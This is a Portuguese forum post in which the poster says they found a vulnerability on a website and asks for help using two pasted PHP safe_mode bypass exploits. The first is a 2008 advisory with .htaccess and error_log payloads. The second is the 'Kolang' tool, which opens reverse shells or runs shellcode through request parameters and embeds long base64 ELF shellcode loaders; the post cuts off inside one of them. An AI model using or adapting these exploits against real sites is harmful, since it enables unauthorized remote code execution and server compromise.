Tweet
Safe Mode Vulnerability
Boas, achei uma vulnerablidade em um site e ja tenho alguns exploits queria saber como usálos 
a vulnerabilidade que quero explorar é PHP safemode bypass
por favor ajudem-me
aqui o código exploit
1º:
[ SecurityReason.com PHP 5.2.6 (error_log) safe_mode bypass ]
Author: Maksymilian Arciemowicz (cXIb8O3)
securityreason.com
Date:
- - Written: 10.11.2008
- - Public: 20.11.2008
SecurityReason Research
SecurityAlert Id: 57
CWE: CWE-264
SecurityRisk: Medium
Affected Software: PHP 5.2.6
Advisory URL: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Vendor: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl
with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web
developers to write dynamically generated pages quickly.
error_log
They allow you to define your own error handling rules, as well as modify the way the errors can
be logged. This allows you to change and enhance error reporting to suit your needs.
- --- 0. error_log const. bypassed by php_admin_flag ---
The main problem is between using safe_mode in global mode
php.iniÂ*:
safe_mode = On
and declaring via php_admin_flag
<Directory "/www">
...
php_admin_flag safe_mode On
</Directory>
When we create some php script in /www/ and try call to:
ini_set("error_log", "/hack/");
or in /www/.htaccess
php_value error_log "/hack/bleh.php"
Result:
Warning: Unknown: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in Unknown on line 0
Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4
It was for safe_mode declared in php.ini. But if we use
php_admin_flag safe_mode On
in httpd.conf, we will get only
Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4
syntax in .htaccess
php_value error_log "/hack/blehx.php"
is allowed and bypass safe_mode.
example exploit:
error_log("<?php phpinfo(); ?>", 0);
- --- 2. How to fix ---
Fixed in CVS
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Note:
Do not use safe_mode as a main safety.
--- 3. Greets ---
sp3x Infospec schain p_e_a pi3
- --- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
# milw0rm.com [2008-11-20]
2º:
<?php
/*
Kolang (PHP Safe mode bypass)
(IHSteam priv8 for lazy penetration testers)
(php 4.3.10 - 5.3.0)
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... (12/19/2009)
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... (12/09/2008)
1- Kolang can be used directly in file inclusion RFI&LFI vulnerabilities (no upload required)
2- Kolang can execute arbitrary shellcode (just for fans of metasploit )
~~~~ How to use
for linux:
kolang.php?os=linux&host=LHOST&port=LPORT
or
kolang.php?os=linux&shell=BASE64_ENCODED_SHELLCODE
for freebsd:
kolang.php?os=freebsd&shell=BASE64_ENCODED_SHELLCO DE
file inclusion :
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
hamid@bugtraq ~ $ nc -vv -l -p 2121
listening on [any] 2121 ...
connect to [127.0.0.1] from bugtraq [127.0.0.1] 40526
id
uid=65534(nobody) gid=65533(nogroup) groups=65533(nogroup)
Hamid Ebadi
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
contact : ebadi~bugtraq~ir
Kolang means pickaxe (the idea came from amnafzar naming convention)
(Separ, Sarand, Alak, Skort)
*/
$port= intval($_REQUEST['port']);
$host= $_REQUEST['host'];
$os= $_REQUEST['os'];
/*
//compile : cc -o shellcode.so -fPIC -shared shellcode.c
//
//<?php
//$data=file_get_contents('shellcode.so');
//file_put_contents('shellcode_base64.txt',$data);
//?>
// "shellcode loader" : load and execute arbitrary shellcode from a file
// Hamid Ebadi
#define O_RDONLY 00 ; fcntl.h
#define SHELLCODE_MAX_SIZE 1024
// change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp'
#define SHELLCODE_FILENAME "/tmp/.X11-IHSTEAM"
void getuid()
{
unsetenv("LD_PRELOAD"); //not really necessary, we can remove it
int fd;
char shellcode[SHELLCODE_MAX_SIZE];
char filename[]=SHELLCODE_FILENAME ;
// we can also pass the shellcode in program's arguments
if ((fd = open(SHELLCODE_FILENAME,O_RDONLY)) < 0) {
exit(1);
}
if (read(fd,shellcode,SHELLCODE_MAX_SIZE) < 0){
exit(1);
}
(*(void(*)()) shellcode)();
}
*/
if ($_REQUEST['os']=='freebsd'){
// freebsd shellcode loader (x86)
$shellcode_loader=
"f0VMRgEBAQkAAAAAAAAAAAMAAwABAAAAeAUAADQAAADsCQAAA AAAADQAIAADACgAFwAUAAEAAAAA
AAAAAAAAAAAAAADhBwAA4QcAAAUAAAAAEAAAAQAAAOQHAADkFw AA5BcAAPwAAAAYAQAABgAAAAAQ
AAACAAAA8AcAAPAXAADwFwAAoAAAAKAAAAAGAAAABAAAABEAAA AkAAAAAAAAAB0AAAAeAAAAIgAA
ABUAAAAAAAAAAAAAABoAAAAcAAAAIwAAACEAAAAbAAAAAAAAAC AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAXAAAAFAAAABYA
AAAZAAAAAAAAAB8AAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAJQAAAAAAAAAAwAB
AAAAAABwAQAAAAAAAAMAAgAAAAAAsAMAAAAAAAADAAMAAAAAAG QEAAAAAAAAAwAEAAAAAACUBAAA
AAAAAAMABQAAAAAA1AQAAAAAAAADAAYAAAAAAOgEAAAAAAAAAw AHAAAAAAB4BQAAAAAAAAMACAAA
AAAAJAcAAAAAAAADAAkAAAAAADAHAAAAAAAAAwAKAAAAAADkFw AAAAAAAAMACwAAAAAA7BcAAAAA
AAADAAwAAAAAAPAXAAAAAAAAAwANAAAAAACQGAAAAAAAAAMADg AAAAAAmBgAAAAAAAADAA8AAAAA
AKAYAAAAAAAAAwAQAAAAAACkGAAAAAAAAAMAEQAAAAAA4BgAAA AAAAADABIAAAAAAAAAAAAAAAAA
AwATAIQAAAAAAAAAAAAAABAAAAABAAAA8BcAAAAAAAARAPH/LAAAAAAAAAAAAAAAIAAAAH0AAABU
BgAAnQAAABIACAAgAAAA1AQAAAAAAAASAAYAOwAAAAAAAAAAAA AAIAAAAJcAAAAAAAAAAAAAABAA
AACjAAAA4BgAAAAAAAAQAPH/JgAAACQHAAAAAAAAEgAJAJwAAADgGAAAAAAAABAA8f8KAAAApB gA
AAAAAAARAPH/rwAAAPwYAAAAAAAAEADx/5IAAAAAAAAAAAAAABAAAACNAAAAAAAAAAAAAAAQAAAA
aQAAAAAAAAAAAAAAIAAAAFMAAAAAAAAAAAAAACAAAAAAX0RZTk FNSUMAX0dMT0JBTF9PRkZTRVRf
VEFCTEVfAF9pbml0AF9maW5pAF9fY3hhX2ZpbmFsaXplAF9fZG VyZWdpc3Rlcl9mcmFtZV9pbmZv
AF9fcmVnaXN0ZXJfZnJhbWVfaW5mbwBfSnZfUmVnaXN0ZXJDbG Fzc2VzAGdldHVpZAB1bnNldGVu
dgBvcGVuAGV4aXQAcmVhZABfZWRhdGEAX19ic3Nfc3RhcnQAX2 VuZADkFwAACAAAAOgXAAAIAAAA
0BgAAAYWAADUGAAABhkAANgYAAAGIgAA3BgAAAYjAACwGAAABx QAALQYAAAHFgAAuBgAAAcZAAC8
GAAABxoAAMAYAAAHIAAAxBgAAAchAADIGAAAByIAAMwYAAAHIw AAg+wM6BQBAADoEwIAAIPEDMMA
AAD/swQAAAD/owgAAAAAAAAA/6MMAAAAaAAAAADp4P////+jEAAAAGgIAAAA6dD/////oxQAAABo
EAAAAOnA/////6MYAAAAaBgAAADpsP////+jHAAAAGggAAAA6aD/////oyAAAABoKAAAAOmQ////
/6MkAAAAaDAAAADpgP////+jKAAAAGg4AAAA6XD///9VieVT6AAAAABbgcMjEwAAUYC7PAAAAAB1
WIuTLAAAAIXSdB+D7Az/s0D////oXv///4PEEOsMkIPABImDRP/////Si4NE////ixCF0nXpi4Mw
AAAAhcB0EoPsDI2DSP///1DoOP///4PEEMaDPAAAAAGLXfzJw5BVieVT6AAAAABbgcOrEgAAUIuD
OAAAAIXAdBmD7AiNg0AAAABQjYNI////UOhH////g8QQi4P8////hcB0HouDNAAAAIXAdBSD7AyN
g/z///9Q6BH///+DxBCJ9otd/MnDkJCQVYnlV1ZTgew8BAAA6AAAAABbgcM/EgAAg+wMjYPW7v//
UOh9/v//g8QQjb24+///jbPh7v///LkSAAAA86SD7AhqAI2D4e7//1Dopf7//4PEEIlF5IN95AB5
CoPsDGoB6H/+//+D7ARoAAQAAI2F2Pv//1D/deToWP7//4PEEIXAeQqD7AxqAehX/v//jYXY+///
/9CNZfRbXl/Jw5CQkFWJ5VZT6AAAAABbgcOmEQAAjYPw////jXD8i0D86wiQg+4E/9CLBoP4/3X0
W17Jw4PsDOhM/v//g8QMwyRGcmVlQlNEOiBzcmMvbGliL2NzdS9pMzg2LWVsZi9jcn RpLlMsdiAx
LjcgMjAwNS8wNS8xOSAwNzozMTowNiBkZnIgRXhwICQATERfUF JFTE9BRAAvdG1wLy5YMTEtSUhT
VEVBTQAkRnJlZUJTRDogc3JjL2xpYi9jc3UvaTM4Ni1lbGYvY3 J0bi5TLHYgMS42IDIwMDUvMDUv
MTkgMDc6MzE6MDYgZGZyIEV4cCAkAAAAAOQXAACcGAAAAAAAAA wAAADUBAAADQAAACQHAAAEAAAA
lAAAAAUAAACwAwAABgAAAHABAAAKAAAAtAAAAAsAAAAQAAAAAw AAAKQYAAACAAAAQAAAABQAAAAR
AAAAFwAAAJQEAAARAAAAZAQAABIAAAAwAAAAEwAAAAgAAAD6//9vAgAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/////AAAAAP////8AAAAAAAAAAPAXAAAAAAAAAAAA
AP4EAAAOBQAAHgUAAC4FAAA+BQAATgUAAF4FAABuBQAAAAAAAA AAAAAAAAAAAAAAAABHQ0M6IChH
TlUpIDMuNC42IFtGcmVlQlNEXSAyMDA2MDMwNQAAR0NDOiAoR0 5VKSAzLjQuNiBbRnJlZUJTRF0g
MjAwNjAzMDUAAEdDQzogKEdOVSkgMy40LjYgW0ZyZWVCU0RdID IwMDYwMzA1AAAuc3ltdGFiAC5z
dHJ0YWIALnNoc3RydGFiAC5oYXNoAC5keW5zeW0ALmR5bnN0cg AucmVsLmR5bgAucmVsLnBsdAAu
aW5pdAAudGV4dAAuZmluaQAucm9kYXRhAC5kYXRhAC5laF9mcm FtZQAuZHluYW1pYwAuY3RvcnMA
LmR0b3JzAC5qY3IALmdvdAAuYnNzAC5jb21tZW50AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAGwAAAAUAAAACAAAAlAAAAJQAAADcAA AAAgAAAAAAAAAEAAAABAAAACEA
AAALAAAAAgAAAHABAABwAQAAQAIAAAMAAAAUAAAABAAAABAAAA ApAAAAAwAAAAIAAACwAwAAsAMA
ALQAAAAAAAAAAAAAAAEAAAAAAAAAMQAAAAkAAAACAAAAZAQAAG QEAAAwAAAAAgAAAAAAAAAEAAAA
CAAAADoAAAAJAAAAAgAAAJQEAACUBAAAQAAAAAIAAAAHAAAABA AAAAgAAABDAAAAAQAAAAYAAADU
BAAA1AQAABEAAAAAAAAAAAAAAAQAAAAAAAAAPgAAAAEAAAAGAA AA6AQAAOgEAACQAAAAAAAAAAAA
AAAEAAAABAAAAEkAAAABAAAABgAAAHgFAAB4BQAArAEAAAAAAA AAAAAABAAAAAAAAABPAAAAAQAA
AAYAAAAkBwAAJAcAAAwAAAAAAAAAAAAAAAQAAAAAAAAAVQAAAA EAAAACAAAAMAcAADAHAACxAAAA
AAAAAAAAAAABAAAAAAAAAF0AAAABAAAAAwAAAOQXAADkBwAACA AAAAAAAAAAAAAABAAAAAAAAABj
AAAAAQAAAAIAAADsFwAA7AcAAAQAAAAAAAAAAAAAAAQAAAAAAA AAbQAAAAYAAAADAAAA8BcAAPAH
AACgAAAAAwAAAAAAAAAEAAAACAAAAHYAAAABAAAAAwAAAJAYAA CQCAAACAAAAAAAAAAAAAAABAAA
AAAAAAB9AAAAAQAAAAMAAACYGAAAmAgAAAgAAAAAAAAAAAAAAA QAAAAAAAAAhAAAAAEAAAADAAAA
oBgAAKAIAAAEAAAAAAAAAAAAAAAEAAAAAAAAAIkAAAABAAAAAw AAAKQYAACkCAAAPAAAAAAAAAAA
AAAABAAAAAQAAACOAAAACAAAAAMAAADgGAAA4AgAABwAAAAAAA AAAAAAAAQAAAAAAAAAkwAAAAEA
AAAAAAAAAAAAAOAIAABvAAAAAAAAAAAAAAABAAAAAAAAABEAAA ADAAAAAAAAAAAAAABPCQAAnAAA
AAAAAAAAAAAAAQAAAAAAAAABAAAAAgAAAAAAAAAAAAAAhA0AAB AEAAAWAAAAMQAAAAQAAAAQAAAA
CQAAAAMAAAAAAAAAAAAAAJQRAAD1AQAAAAAAAAAAAAABAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAlAAAAAAAAAADAAEAAAAAAHABAAAAAAAAAwACAAAAAACwAw AAAAAAAAMAAwAAAAAAZAQAAAAA
AAADAAQAAAAAAJQEAAAAAAAAAwAFAAAAAADUBAAAAAAAAAMABg AAAAAA6AQAAAAAAAADAAcAAAAA
AHgFAAAAAAAAAwAIAAAAAAAkBwAAAAAAAAMACQAAAAAAMAcAAA AAAAADAAoAAAAAAOQXAAAAAAAA
AwALAAAAAADsFwAAAAAAAAMADAAAAAAA8BcAAAAAAAADAA0AAA AAAJAYAAAAAAAAAwAOAAAAAACY
GAAAAAAAAAMADwAAAAAAoBgAAAAAAAADABAAAAAAAKQYAAAAAA AAAwARAAAAAADgGAAAAAAAAAMA
EgAAAAAAAAAAAAAAAAADABMAAAAAAAAAAAAAAAAAAwAUAAAAAA AAAAAAAAAAAAMAFQAAAAAAAAAA
AAAAAAADABYAAQAAAAAAAAAAAAAABADx/yIAAAAAAAAAAAAAAAQA8f8xAAAAAAAAAAAAAAAEAPH/
AQAAAAAAAAAAAAAABADx/zwAAAAAAAAAAAAAAAQA8f9HAAAAkBgAAAAAAAABAA4AVQAAAJg YAAAA
AAAAAQAPAGMAAADsFwAAAAAAAAEADAB2AAAAoBgAAAAAAAABAB AAgwAAAOgXAAAAAAAAAQALAIcA
AADgGAAAAQAAAAEAEgCTAAAAeAUAAAAAAAACAAgAqQAAAOQYAA AYAAAAAQASALIAAADwBQAAAAAA
AAIACAA8AAAAAAAAAAAAAAAEAPH/vgAAAJQYAAAAAAAAAQAOAMsAAACcGAAAAAAAAAEADwDYAAAA
7BcAAAAAAAABAAwA5gAAAKAYAAAAAAAAAQAQAPIAAAD0BgAAAA AAAAIACAAIAQAAAAAAAAAAAAAE
APH/IgAAAAAAAAAAAAAABADx/zEAAAAAAAAAAAAAAAQA8f8IAQAAAAAAAAAAAAAEAPH/KQEAAAAA
AAAAAAAABADx/zUBAADkFwAAAAAAAAECCwBCAQAAAAAAAAAAAAAQAAAASwEAAPA XAAAAAAAAEQDx
/1QBAAAAAAAAAAAAACAAAABjAQAAVAYAAJ0AAAASAAgAagEAANQ EAAAAAAAAEgAGAHABAAAAAAAA
AAAAACAAAACIAQAAAAAAAAAAAAAQAAAAjQEAAOAYAAAAAAAAEA Dx/5kBAAAkBwAAAAAAABIACQCf
AQAA4BgAAAAAAAAQAPH/pgEAAKQYAAAAAAAAEQDx/7wBAAD8GAAAAAAAABAA8f/BAQAAAAAAAAAA
AAAQAAAAxgEAAAAAAAAAAAAAEAAAAMsBAAAAAAAAAAAAACAAAA DfAQAAAAAAAAAAAAAgAAAAAC91
c3Ivc3JjL2xpYi9jc3UvaTM4Ni1lbGYvY3J0aS5TADxjb21tYW 5kIGxpbmU+ADxidWlsdC1pbj4A
Y3J0c3R1ZmYuYwBfX0NUT1JfTElTVF9fAF9fRFRPUl9MSVNUX1 8AX19FSF9GUkFNRV9CRUdJTl9f
AF9fSkNSX0xJU1RfXwBwLjAAY29tcGxldGVkLjEAX19kb19nbG 9iYWxfZHRvcnNfYXV4AG9iamVj
dC4yAGZyYW1lX2R1bW15AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU 5EX18AX19GUkFNRV9FTkRfXwBf
X0pDUl9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgAL3Vzci 9zcmMvbGliL2NzdS9pMzg2LWVs
Zi9jcnRuLlMAc2hlbGxjb2RlLmMAX19kc29faGFuZGxlAHVuc2 V0ZW52AF9EWU5BTUlDAF9fY3hh
X2ZpbmFsaXplAGdldHVpZABfaW5pdABfX2RlcmVnaXN0ZXJfZn JhbWVfaW5mbwByZWFkAF9fYnNz
X3N0YXJ0AF9maW5pAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQU JMRV8AX2VuZABleGl0AG9wZW4A
X0p2X1JlZ2lzdGVyQ2xhc3NlcwBfX3JlZ2lzdGVyX2ZyYW1lX2 luZm8A";
}else{
// default: linux
// linux shellcode loader (x86)
$shellcode_loader=
"f0VMRgEBAQAAAAAAAAAAAAMAAwABAAAAIAQAADQAAACIEQAAA AAAADQAIAAGACgAGwAYAAEAAAAA
AAAAAAAAAAAAAABIBgAASAYAAAUAAAAAEAAAAQAAAAwPAAAMHw AADB8AABABAAAYAQAABgAAAAAQ
AAACAAAAIA8AACAfAAAgHwAAyAAAAMgAAAAGAAAABAAAAFHldG QAAAAAAAAAAAAAAAAAAAAAAAAA
AAYAAAAEAAAAUuV0ZAwPAAAMHwAADB8AAPQAAAD0AAAABAAAAA EAAACAFQRlAAAAAAAAAAAAAAAA
AAAAAAAAAAAAKAAABAAAAAMAAAAOAAAADAAAAAcAAAAGAAAAAA AAAAAAAAAAAAAAAgAAAAAAAAAN
AAAACwAAAAkAAAADAAAABQAAAAgAAAABAAAACgAAAAQAAAADAA AACAAAAAIAAAAGAAAAiAAhAQDE
QAkIAAAACwAAAA0AAAAGpIf/uuOSfENF1ezYcVgcuY3xDuvT7w4AAAAAAAAAAAAAAAAAAAAATw AA
AAAAAAB6AAAAEgAAAAEAAAAAAAAAAAAAACAAAAArAAAAAAAAAA AAAAAgAAAARgAAAAAAAAD+AAAA
EgAAAFkAAAAAAAAAegAAABIAAAAcAAAAAAAAAAsBAAAiAAAAVA AAAAAAAAD9AAAAEgAAAD8AAAAM
BQAAvQAAABIACwB7AAAAJCAAAAAAAAAQAPH/aAAAABwgAAAAAAAAEADx/28AAAAcIAAAAAAAABAA
8f8QAAAAkAMAAAAAAAASAAkAFgAAAAgGAAAAAAAAEgAMAABfX2 dtb25fc3RhcnRfXwBfaW5pdABf
ZmluaQBfX2N4YV9maW5hbGl6ZQBfSnZfUmVnaXN0ZXJDbGFzc2 VzAGdldHVpZAB1bnNldGVudgBv
cGVuAGV4aXQAcmVhZABsaWJjLnNvLjYAX2VkYXRhAF9fYnNzX3 N0YXJ0AF9lbmQAR0xJQkNfMi4x
LjMAR0xJQkNfMi4wAAAAAgAAAAAAAgACAAMAAgABAAEAAQABAA EAAQAAAAEAAgBeAAAAEAAAAAAA
AABzH2kJAAADAIAAAAAQAAAAEGlpDQAAAgCMAAAAAAAAABggAA AIAAAA6B8AAAYCAADsHwAABgMA
APAfAAAGBgAAACAAAAcBAAAEIAAABwIAAAggAAAHBAAADCAAAA cFAAAQIAAABwYAABQgAAAHBwAA
VYnlg+wI6IUAAADoMAEAAOgrAgAAycMA/7MEAAAA/6MIAAAAAAAAAP+jDAAAAGgAAAAA6eD/////
oxAAAABoCAAAAOnQ/////6MUAAAAaBAAAADpwP////+jGAAAAGgYAAAA6bD/////oxwAAABoIAAA
AOmg/////6MgAAAAaCgAAADpkP///wAAAAAAAAAAVYnlU4PsBOgAAAAAW4HDyBsAAIuT9P///4XS
dAXohv///1hbycOQkJCQkJCQkJCQVYnlVlPorQAAAIHDmhsAAIPsEIC7KAA AAAB1XYuD/P///4XA
dA6LgyQAAACJBCTodP///4uLLAAAAI2DJP///42TIP///ynQwfgCjXD/OfFzII22AAAAAI1BAYmD
LAAAAP+UgyD///+LiywAAAA58XLmxoMoAAAAAYPEEFteXcNVieVT6C4AAACBwxsb AACD7ASLkyj/
//+F0nQVi5P4////hdJ0C42DKP///4kEJP/Sg8QEW13Dixwkw5BVieVTgew0BAAA6Oz///+Bw9ka
AACNgzDm//+JBCToqf7//8eF5vv//y90bXDHher7//8vLlgxx4Xu+///MS1JSMeF8vv//1NURUFm
x4X2+///TQDHRCQEAAAAAI2DO+b//4kEJOhC/v//iUX4g334AHkMxwQkAQAAAOh9/v//x0QkCAAE
AACNhfj7//+JRCQEi0X4iQQk6ED+//+FwHkMxwQkAQAAAOhQ/v//jYX4+////9CBxDQEAABbXcOQ
kJCQkJCQVYnlVlPoLf///4HDGhoAAIuDGP///4P4/3QZjbMY////jbQmAAAAAIPuBP/QiwaD+P91
9FteXcNVieVTg+wE6AAAAABbgcPgGQAA6DD+//9ZW8nDTERfUFJFTE9BRAAvdG1wLy5YMTEtSUhT
VEVBTQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/////wAAAAD/////AAAAAAAAAAABAAAA
XgAAAAwAAACQAwAADQAAAAgGAAAEAAAA9AAAAPX+/29AAQAABQAAAFwCAAAGAAAAfAEAAAoAAACW
AAAACwAAABAAAAADAAAA9B8AAAIAAAAwAAAAFAAAABEAAAAXAA AAYAMAABEAAABAAwAAEgAAACAA
AAATAAAACAAAAP7//28QAwAA////bwEAAADw//9v8gIAAPr//28BAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC AfAAAAAAAAAAAAAL4DAADOAwAA
3gMAAO4DAAD+AwAADgQAABggAAAAR0NDOiAoR2VudG9vIDQuMy 4xLXIxIHAxLjEpIDQuMy4xAABH
Q0M6IChHZW50b28gNC4zLjIgcDEuMSkgNC4zLjIAAEdDQzogKE dlbnRvbyA0LjMuMiBwMS4xKSA0
LjMuMgAAR0NDOiAoR2VudG9vIDQuMy4yIHAxLjEpIDQuMy4yAA BHQ0M6IChHZW50b28gNC4zLjEt
cjEgcDEuMSkgNC4zLjEAAC5zeW10YWIALnN0cnRhYgAuc2hzdH J0YWIALmdudS5oYXNoAC5keW5z
eW0ALmR5bnN0cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3 IALnJlbC5keW4ALnJlbC5wbHQA
LmluaXQALnRleHQALmZpbmkALnJvZGF0YQAuZWhfZnJhbWUALm N0b3JzAC5kdG9ycwAuamNyAC5k
eW5hbWljAC5nb3QALmdvdC5wbHQALmRhdGEALmJzcwAuY29tbW VudAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB8AAAAFAAAAAgAAAP QAAAD0AAAATAAAAAMAAAAAAAAA
BAAAAAQAAAAbAAAA9v//bwIAAABAAQAAQAEAADwAAAADAAAAAAAAAAQAAAAEAAAAJQAAAA sAAAAC
